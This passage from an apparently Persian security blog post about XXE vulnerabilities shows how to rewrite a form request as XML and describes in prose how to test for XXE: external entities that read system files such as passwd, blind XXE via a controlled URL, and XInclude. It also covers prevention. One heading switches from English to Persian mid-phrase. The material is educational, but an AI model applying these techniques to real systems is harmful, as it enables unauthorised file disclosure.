Some websites expect to receive requests in this particular format, but will also accept other content types, including XML.\nFor example, if a normal request looks like this:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3ee0931 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3ee0931\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b81ba27\" data-id=\"b81ba27\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-bbb0f27 elementor-widget elementor-widget-text-editor\" data-id=\"bbb0f27\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">POST \/action HTTP\/1.0<\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Type: application\/x-www-form-urlencoded<\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Length: 7<\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">foo=bar<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d167254 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d167254\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ffe797f\" data-id=\"ffe797f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9ad1ad6 elementor-widget elementor-widget-text-editor\" data-id=\"9ad1ad6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>If so, you may be able to submit the following request instead and get the same result (note that Content-Length is recomputed for the new body, 52 bytes here):<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bac7764 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bac7764\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9997f84\" data-id=\"9997f84\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f4f387a elementor-widget elementor-widget-text-editor\" data-id=\"f4f387a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">POST \/action HTTP\/1.0<\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Type: text\/xml<\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Length: 52<\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;foo&gt;bar&lt;\/foo&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6dd1531 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6dd1531\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e53af18\" data-id=\"e53af18\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5270f3b elementor-widget elementor-widget-text-editor\" data-id=\"5270f3b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tIf the application accepts requests with XML in the message body and parses that body as XML, you can reach the hidden XXE attack surface simply by reformatting the request so that it uses XML; the DOCTYPE and entity payloads from the earlier sections then apply unchanged.\n<h3 id=\"find-xxes\"><span style=\"font-size: 12pt;\">How XXE vulnerabilities 
\u0628\u06cc\u0627\u0628\u06cc\u0645\u061f (\u062a\u0633\u062a \u0648\u062c\u0648\u062f XXE)<\/span><\/h3>\n\u062a\u0639\u062f\u0627\u062f \u06a9\u062b\u06cc\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0647 \u0633\u0631\u0639\u062a \u0648 \u0628\u0627 \u0636\u0631\u06cc\u0628 \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0628\u0627\u0644\u0627\u060c \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0633\u06a9\u0646\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0648\u0628 Burp Suite \u0628\u06cc\u0627\u0628\u06cc\u062f.\n\u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u062f\u0633\u062a\u06cc \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u0627\u06cc\u062f \u0645\u0631\u0627\u062d\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f:\n<ul>\n \t<li>\u062a\u0633\u062a \u0627\u0645\u06a9\u0627\u0646 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627: \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u06cc\u06a9\u06cc \u0627\u0632 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u06a9\u0627\u0645\u0644\u0627 \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647\u200c\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0639\u0627\u0645\u0644 (\u0645\u062b\u0644 passwd) \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f\u060c \u0648 \u0633\u067e\u0633 \u0627\u0632 \u0622\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062f\u0631 
\u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f.<\/li>\n \t<li>\u062a\u0633\u062a \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc Blind XXE: \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u0628\u0631\u0627\u0628\u0631 URL \u0633\u06cc\u0633\u062a\u0645\u06cc \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u0634\u0645\u0627\u0633\u062a\u060c \u0648 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0627 \u0622\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0631\u0627 \u0645\u0627\u0646\u06cc\u062a\u0648\u0631 \u06a9\u0646\u06cc\u062f.<\/li>\n \t<li>\u062a\u0633\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0627\u062f\u0647 \u063a\u06cc\u0631 XML \u062f\u0631 \u0627\u0633\u0646\u0627\u062f XML: \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u06cc\u0645\u060c \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u062d\u062a\u06cc \u0627\u06af\u0631 \u062f\u0631 \u0642\u0627\u0644\u0628 XML \u0646\u0628\u0627\u0634\u0646\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u062f\u0631 \u06cc\u06a9 \u0633\u0646\u062f XML 
\u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0634\u0648\u0646\u062f. \u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u0648\u062c\u0648\u062f \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0627\u06cc\u062f \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9 \u062d\u0645\u0644\u0647 XInclude \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u0648 \u0633\u0639\u06cc \u06a9\u0646\u06cc\u062f \u06cc\u06a9\u06cc \u0627\u0632 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647\u200c\u06cc \u0633\u06cc\u0633\u062a\u0645 (\u0645\u0627\u0646\u0646\u062f passwd) \u0631\u0627 \u0628\u0647 \u062f\u0633\u062a \u0622\u0648\u0631\u06cc\u062f.<\/li>\n<\/ul>\n<h3 id=\"prevent-xxes\"><span style=\"font-size: 12pt;\">\u0686\u06af\u0648\u0646\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u0645\u061f<\/span><\/h3>\n\u062a\u0645\u0627\u0645\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0628\u0647 \u0627\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u0646\u062f \u06a9\u0647 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647\u200c\u06cc \u062a\u062c\u0632\u06cc\u0647\u200c\u06cc XML \u06a9\u0647 \u062a\u0648\u0633\u0637 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0627\u0632 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a\u06cc \u062f\u0631 XML \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646 \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0633\u06cc\u0627\u0631 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0628\u0627\u0634\u0646\u062f\u060c 
\u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0647 \u0622\u0646\u200c\u0647\u0627 \u0646\u06cc\u0627\u0632\u06cc \u0646\u062f\u0627\u0631\u062f \u0648 \u0642\u0631\u0627\u0631 \u0646\u06cc\u0633\u062a \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f. \u0622\u0633\u0627\u0646\u200c\u062a\u0631\u06cc\u0646 \u0648 \u0645\u0648\u062b\u0631\u062a\u0631\u06cc\u0646 \u0631\u0627\u0647 \u0628\u0631\u0627\u06cc \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE\u060c \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a \u062f\u0631 Parser \u0627\u0633\u062a.\n\u0639\u0645\u0648\u0645\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u062a\u062c\u0632\u06cc\u0647\u200c\u06cc \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0648 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 XInclude \u06a9\u0627\u0641\u06cc \u0627\u0633\u062a. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0631\u0627 \u0645\u0639\u0645\u0648\u0644\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0648 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u06a9\u062f \u067e\u0627\u0631\u0633\u0631 \u0648 \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0631\u0641\u062a\u0627\u0631\u0647\u0627\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f. 
\u0628\u0631\u0627\u06cc \u06cc\u0627\u0641\u062a\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631\u0628\u0627\u0631\u0647\u200c\u06cc \u0646\u062d\u0648\u0647\u200c\u06cc \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a \u063a\u06cc\u0631\u0636\u0631\u0648\u0631\u06cc\u060c \u0628\u0647 \u062f\u0627\u06a9\u06cc\u0648\u0645\u0646\u062a\u06cc\u0634\u0646 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u06cc\u0627 API \u067e\u0627\u0631\u0633\u0631 XML \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d30ee18 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d30ee18\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f4c5eb4\" data-id=\"f4c5eb4\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-51b166e elementor-widget elementor-widget-accordion\" data-id=\"51b166e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"accordion.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-accordion\">\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\n\t\t\t\t\t<div id=\"elementor-tab-title-8561\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"button\" aria-controls=\"elementor-tab-content-8561\" aria-expanded=\"false\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon 
elementor-accordion-icon-right\" aria-hidden=\"true\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-plus\"><\/i><\/span>\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-minus\"><\/i><\/span>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" tabindex=\"0\">\u0628\u06cc\u0634\u062a\u0631 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t<div id=\"elementor-tab-content-8561\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"region\" aria-labelledby=\"elementor-tab-title-8561\"><ul>\n<li><strong><a href=\"https:\/\/liangroup.net\/blog\/installing-and-operating-vulnerability-scanners\/\">\u0622\u0645\u0648\u0632\u0634 \u0646\u0635\u0628 \u0648 \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0627\u0646\u0648\u0627\u0639 \u0627\u0633\u06a9\u0646\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc<\/a><\/strong><\/li>\n<\/ul><\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u06cc\u0645 \u0628\u0627 \u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u06cc \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u062f\u060c \u0628\u0627 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0622\u0634\u0646\u0627 \u0634\u0648\u06cc\u0645. 
XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a OWASP Top 10 \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f. \u0627\u0645\u0627 \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0647 \u0628\u0647\u062a\u0631 \u0628\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u062f\u0631\u06a9 \u06a9\u0646\u06cc\u0645\u060c &hellip;<\/p>\n","protected":false},"author":1,"featured_media":11093,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,275,349],"tags":[],"class_list":["post-11057","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pentest","category-penetration-test-article","category-slides"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.5 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646<\/title>\n<meta name=\"description\" content=\"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 
\u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/liangroup.net\/blog\/what-is-xxe\/\" \/>\n<meta property=\"og:locale\" content=\"fa_IR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f\" \/>\n<meta property=\"og:description\" content=\"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/liangroup.net\/blog\/what-is-xxe\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\" \/>\n<meta property=\"article:author\" content=\"#\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-19T13:31:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-02-05T12:01:43+00:00\" \/>\n<meta property=\"og:image\" 
content=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"\u0627\u062f\u0645\u06cc\u0646\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@#\" \/>\n<meta name=\"twitter:site\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:label1\" content=\"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a\" \/>\n\t<meta name=\"twitter:data1\" content=\"\u0627\u062f\u0645\u06cc\u0646\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646\" \/>\n\t<meta name=\"twitter:data2\" content=\"29 \u062f\u0642\u06cc\u0642\u0647\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\"},\"author\":{\"name\":\"\u0627\u062f\u0645\u06cc\u0646\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/56ec88338ff7cb5202779a216d9f3399\"},\"headline\":\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f 
\u0645\u06cc\u200c\u0622\u06cc\u062f\u061f\",\"datePublished\":\"2021-05-19T13:31:26+00:00\",\"dateModified\":\"2022-02-05T12:01:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\"},\"wordCount\":959,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"articleSection\":[\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u0648 \u0627\u0645\u0646\u06cc\u062a\",\"\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630\",\"\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f\"],\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\",\"name\":\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 